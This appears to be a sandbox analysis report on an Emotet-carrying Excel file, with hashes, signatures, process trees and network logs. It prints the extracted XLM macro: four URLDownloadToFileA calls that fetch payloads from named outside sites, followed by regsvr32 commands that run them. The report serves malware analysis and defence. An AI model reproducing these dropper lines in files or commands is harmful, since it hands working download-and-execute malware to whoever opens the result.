Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

emotet_v6

windows10-1703-x64

10

emotet_doc

windows10-1703-x64

10

Analysis

  • max time kernel
    129s
  • max time network
    146s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    04/11/2022, 05:30 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b13a80ec8064a62693a6ac15180a6cbd48e3c0bef89be2f7c525258efc350067.xls

  • Size

    217KB

  • MD5

    dab2910a25d6f162a6d723f803ed0416

  • SHA1

    91fa3e449d1f226da2e265720afd7bd3c8debe74

  • SHA256

    b13a80ec8064a62693a6ac15180a6cbd48e3c0bef89be2f7c525258efc350067

  • SHA512

    c34c835113029a5bbc34508513de353958a217ec15e598fc83c79909fc20740d8493380c821277c452b871e78ce2f2f432bd216ccaba121814b7955ee11ea5b2

  • SSDEEP

    6144:zKpb8rGYrMPe3q7Q0XV5xtuEsi8/dglyY+TAQXTHGUMEyP5p6f5jQmo:JbGUMVWlbo

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://aquariorecords.com.br/wp-content/A8G3ownNApEj1L4hF/", "..\oxnv1.ooccxx")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://ftp.pricoat.com.mx/Fichas/3ybJLLXu5zqqn8Sx/", "..\oxnv2.ooccxx")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://armannahalpersian.ir/3H5qqUOB/", "..\oxnv3.ooccxx")
4
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://alagi.ge/application/irnz5Rs8qWvQrf/", "..\oxnv4.ooccxx")
URLs
xlm40.dropper

http://aquariorecords.com.br/wp-content/A8G3ownNApEj1L4hF/
xlm40.dropper

http://ftp.pricoat.com.mx/Fichas/3ybJLLXu5zqqn8Sx/
xlm40.dropper

http://armannahalpersian.ir/3H5qqUOB/
xlm40.dropper

http://alagi.ge/application/irnz5Rs8qWvQrf/

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\b13a80ec8064a62693a6ac15180a6cbd48e3c0bef89be2f7c525258efc350067.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3104
    • C:\Windows\System32\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx
      2⤵
      • Process spawned unexpected child process
      PID:3816
    • C:\Windows\System32\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx
      2⤵
      • Process spawned unexpected child process
      PID:4736
    • C:\Windows\System32\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx
      2⤵
      • Process spawned unexpected child process
      PID:3336
    • C:\Windows\System32\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx
      2⤵
      • Process spawned unexpected child process
      PID:2952

Network

  • flag-us
    DNS
    aquariorecords.com.br
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    aquariorecords.com.br
    IN A
    Response
    aquariorecords.com.br
    IN A
    100.126.19.237
  • flag-unknown
    GET
    http://aquariorecords.com.br/wp-content/A8G3ownNApEj1L4hF/
    EXCEL.EXE
    Remote address:
    100.126.19.237:80
    Request
    GET /wp-content/A8G3ownNApEj1L4hF/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: aquariorecords.com.br
    Connection: Keep-Alive
    Response
    HTTP/1.0 404 Not Found
  • flag-us
    DNS
    ftp.pricoat.com.mx
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    ftp.pricoat.com.mx
    IN A
    Response
    ftp.pricoat.com.mx
    IN A
    100.90.51.226
  • flag-unknown
    GET
    http://ftp.pricoat.com.mx/Fichas/3ybJLLXu5zqqn8Sx/
    EXCEL.EXE
    Remote address:
    100.90.51.226:80
    Request
    GET /Fichas/3ybJLLXu5zqqn8Sx/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ftp.pricoat.com.mx
    Connection: Keep-Alive
    Response
    HTTP/1.0 404 Not Found
  • flag-us
    DNS
    armannahalpersian.ir
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    armannahalpersian.ir
    IN A
    Response
    armannahalpersian.ir
    IN A
    100.67.165.3
  • flag-unknown
    GET
    http://armannahalpersian.ir/3H5qqUOB/
    EXCEL.EXE
    Remote address:
    100.67.165.3:80
    Request
    GET /3H5qqUOB/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: armannahalpersian.ir
    Connection: Keep-Alive
    Response
    HTTP/1.0 404 Not Found
  • flag-us
    DNS
    alagi.ge
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    alagi.ge
    IN A
    Response
    alagi.ge
    IN A
    100.116.145.64
  • flag-unknown
    GET
    http://alagi.ge/application/irnz5Rs8qWvQrf/
    EXCEL.EXE
    Remote address:
    100.116.145.64:80
    Request
    GET /application/irnz5Rs8qWvQrf/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: alagi.ge
    Connection: Keep-Alive
    Response
    HTTP/1.0 404 Not Found
  • 100.126.19.237:80
    http://aquariorecords.com.br/wp-content/A8G3ownNApEj1L4hF/
    http
    EXCEL.EXE
    836 B
     368 B
     11
    8

    HTTP Request

    GET http://aquariorecords.com.br/wp-content/A8G3ownNApEj1L4hF/

    HTTP Response

    404
  • 100.90.51.226:80
    http://ftp.pricoat.com.mx/Fichas/3ybJLLXu5zqqn8Sx/
    http
    EXCEL.EXE
    736 B
     368 B
     9
    8

    HTTP Request

    GET http://ftp.pricoat.com.mx/Fichas/3ybJLLXu5zqqn8Sx/

    HTTP Response

    404
  • 100.67.165.3:80
    http://armannahalpersian.ir/3H5qqUOB/
    http
    EXCEL.EXE
    723 B
     368 B
     9
    8

    HTTP Request

    GET http://armannahalpersian.ir/3H5qqUOB/

    HTTP Response

    404
  • 100.116.145.64:80
    http://alagi.ge/application/irnz5Rs8qWvQrf/
    http
    EXCEL.EXE
    729 B
     368 B
     9
    8

    HTTP Request

    GET http://alagi.ge/application/irnz5Rs8qWvQrf/

    HTTP Response

    404
  • 8.8.8.8:53
    aquariorecords.com.br
    dns
    EXCEL.EXE
    67 B
     104 B
     1
    1

    DNS Request

    aquariorecords.com.br

    DNS Response

    100.126.19.237

  • 8.8.8.8:53
    ftp.pricoat.com.mx
    dns
    EXCEL.EXE
    64 B
     98 B
     1
    1

    DNS Request

    ftp.pricoat.com.mx

    DNS Response

    100.90.51.226

  • 8.8.8.8:53
    armannahalpersian.ir
    dns
    EXCEL.EXE
    66 B
     102 B
     1
    1

    DNS Request

    armannahalpersian.ir

    DNS Response

    100.67.165.3

  • 8.8.8.8:53
    alagi.ge
    dns
    EXCEL.EXE
    54 B
     78 B
     1
    1

    DNS Request

    alagi.ge

    DNS Response

    100.116.145.64

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3104-122-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3104-121-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3104-119-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3104-131-0x00007FFD28D90000-0x00007FFD28DA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3104-132-0x00007FFD28D90000-0x00007FFD28DA0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3104-120-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3104-293-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3104-294-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3104-295-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3104-296-0x00007FFD2BB70000-0x00007FFD2BB80000-memory.dmp

    Filesize

    64KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.